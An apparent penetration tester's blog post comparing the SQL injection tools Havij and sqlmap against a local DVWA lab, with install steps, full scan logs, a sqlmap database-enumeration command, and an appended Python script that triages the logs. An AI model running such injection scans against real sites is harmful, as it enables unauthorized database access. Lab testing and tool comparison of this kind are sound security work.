sql injection – havij

Any questions DM me on Twitter @myexploit2600

I wouldn't recommend Havij to anyone; if you don't like sqlmap, try jSQL Injection in Kali. It's like Havij, only seems to work with GET requests, but is still updated, unlike Havij.

Below is crap I wrote about Havij when I tested it. I never used it on a test because it's nasty! Use sqlmap ;0)

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

Download from http://www.itsecteam.com/products/havij-v116-advanced-sql-injection/index.html

Backtrack 5R1

Havij is not installed by default. It’s a Windows-only program. You can run it in Wine.

1. Download Havij to your root folder. Untar the file to the root folder.

2. Right-click the Havij .exe file and choose Open with Wine Windows Program Loader. Havij installs.

3. The Havij application should start.

Target = the injectable target. Click Analyze.

————————————————————

Havij log results for http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

Havij 1.15 Free!
You are using the Free version of Havij which is limited in some features, Please purchase the commerical version at http://itsecteam.com
Analyzing http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
Http Error: 302 Found
Host IP: 127.0.0.1
Web Server: Apache/2.2.14 (Ubuntu)
Powered-by: PHP/5.3.2-1ubuntu4.5
Finding Keyword…
Http Error: 302 Found
Retrying to find keyword…
Http Error: 302 Found
Http Error: 302 Found
Can not find keyword but let me do a try!
Finding Injection type…
Http Error: 302 Found
Http Error: 302 Found
Http Error: 302 Found
Http Error: 302 Found
Http Error: 302 Found
Http Error: 302 Found
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
Http Error: 302 Found
Finding data base type
Http Error: 302 Found
Can’t find db server type! But maybe there be some chances! [-o<
Finding columns count(MySQL,MsSQL 2005): 1
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 2
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 3
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 4
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 5
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 6
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 7
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 8
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 9
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 10
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 11
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 12
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 13
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 14
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 15
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 16
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 17
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 18
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 19
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 20
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 21
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 22
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 23
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 24
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 25
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 26
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 27
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 28
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 29
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 30
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 31
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 32
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 1
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 2
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 3
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 4
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 5
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 6
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 7
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 8
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 9
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 10
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 11
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 12
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 13
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 14
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 15
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 16
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 17
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 18
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 19
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 20
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 21
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 22
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 23
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 24
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 25
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 26
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 27
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 28
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 29
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 30
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 31
Http Error: 302 Found
Trying again to find columns count with string type(MySQL,MsSQL 2005): 32
Http Error: 302 Found
Cannot find column count!
Testing for MySQL error based injection method
Http Error: 302 Found
Bypassing illegal union failed! Turning off this feature
Http Error: 302 Found
MySQL error based injection method cant be used!
Testing for MsSQL time based injection with 1000 ms delay
Http Error: 302 Found
Http Error: 302 Found
MsSQL time based injection method can’t be used
Testing for MySQL time based injection with 14 ms delay
Http Error: 302 Found
Http Error: 302 Found
MySQL time based injection method can’t be used
It seems that input parameter is not effective! Check the following:
Are you sure input parameter really exist?!
Are you sure the input value ‘Submit#’ is valid?
Are you sure the ‘GET’ method is correct?

————————————————————

SQLMAP Log results for http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

dojo@dojo-vm:~/tools/sqlmap$ ./sqlmap.py -u 'http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --dbs

sqlmap/0.9-dev – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 08:39:53

[08:39:53] [INFO] using ‘/home/dojo/tools/sqlmap/output/127.0.0.1/session’ as session file
[08:39:53] [INFO] resuming string match ‘Surname’ from session file
you did not provide any string to match. Do you want to use the resumed string to be matched in page when the query is valid? [Y/n]
[08:39:56] [INFO] resuming injection point ‘GET’ from session file
[08:39:56] [INFO] resuming injection parameter ‘id’ from session file
[08:39:56] [INFO] resuming injection type ‘stringsingle’ from session file
[08:39:56] [INFO] resuming 0 number of parenthesis from session file
[08:39:56] [INFO] resuming back-end DBMS ‘mysql 5’ from session file
[08:39:56] [INFO] testing connection to the target url
sqlmap got a 302 redirect to ../../login.php – What target address do you want to use from now on? http://127.0.0.1:80/dvwa/vulnerabilities/sqli/ (default) or provide another target address based also on the redirection got from the application

>
[08:39:58] [INFO] testing for parenthesis on injectable parameter
[08:39:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[08:39:58] [INFO] fetching database names
[08:39:58] [INFO] fetching number of databases
[08:39:58] [INFO] read from file ‘/home/dojo/tools/sqlmap/output/127.0.0.1/session’: 4
[08:39:58] [INFO] read from file ‘/home/dojo/tools/sqlmap/output/127.0.0.1/session’: information_schema
[08:39:58] [INFO] read from file ‘/home/dojo/tools/sqlmap/output/127.0.0.1/session’: dvwa
[08:39:58] [INFO] read from file ‘/home/dojo/tools/sqlmap/output/127.0.0.1/session’: mysql
[08:39:58] [INFO] read from file ‘/home/dojo/tools/sqlmap/output/127.0.0.1/session’: w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

[08:39:58] [INFO] Fetched data logged to text files under ‘/home/dojo/tools/sqlmap/output/127.0.0.1’

[*] shutting down at: 08:39:58

dojo@dojo-vm:~/tools/sqlmap$

————————————————————

SQLMAP results = 4 databases found.

Havij results = 0 databases found.
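
Added example, not part of the original post: a small Python triage of the two logs above that checks whether each scanner actually reached the page under test before its result is trusted. The log excerpts are shortened from the logs on this page; the `triage` function and its patterns are assumptions written for this illustration.

```python
import re
from collections import Counter

# Constructed excerpts, shortened from the two logs on this page.
HAVIJ_LOG = """\
Analyzing http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
Http Error: 302 Found
Finding Keyword...
Http Error: 302 Found
Finding columns count(MySQL,MsSQL 2005): 1
Http Error: 302 Found
Cannot find column count!
"""

SQLMAP_LOG = """\
[08:39:56] [INFO] resuming injection parameter 'id' from session file
sqlmap got a 302 redirect to ../../login.php - What target address do you want to use from now on?
[08:39:58] [INFO] fetching database names
[08:39:58] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': dvwa
[08:39:58] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': mysql
"""

STATUS = re.compile(r"Http Error: (\d{3})")               # Havij per-request status line
REDIRECT = re.compile(r"got a (\d{3}) redirect to (\S+)")  # sqlmap redirect prompt
CACHED = re.compile(r"resuming .* from session file|read from file .*session")

def triage(log):
    """Summarise whether a scanner log shows the target page was actually reached."""
    lines = log.splitlines()
    statuses = Counter(m.group(1) for l in lines if (m := STATUS.search(l)))
    redirect = next((m.group(2) for l in lines if (m := REDIRECT.search(l))), None)
    cached = sum(1 for l in lines if CACHED.search(l))
    total = sum(statuses.values())
    redirected = sum(n for code, n in statuses.items() if code.startswith("3"))
    findings = []
    if total and redirected == total:
        findings.append("every probe was redirected: the scan never reached the page under test")
    if redirect and "login" in redirect:
        findings.append(f"redirected to {redirect}: requests were unauthenticated")
    if cached:
        findings.append(f"{cached} line(s) came from a cached session, not from live requests")
    return {"statuses": dict(statuses), "redirect": redirect, "cached": cached, "findings": findings}

if __name__ == "__main__":
    for name, log in (("havij", HAVIJ_LOG), ("sqlmap", SQLMAP_LOG)):
        print(name, triage(log))
```

Read this way, the Havij result of 0 databases reflects a scan that only ever saw redirects, and the sqlmap list of 4 was replayed from its session file rather than fetched in this run.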
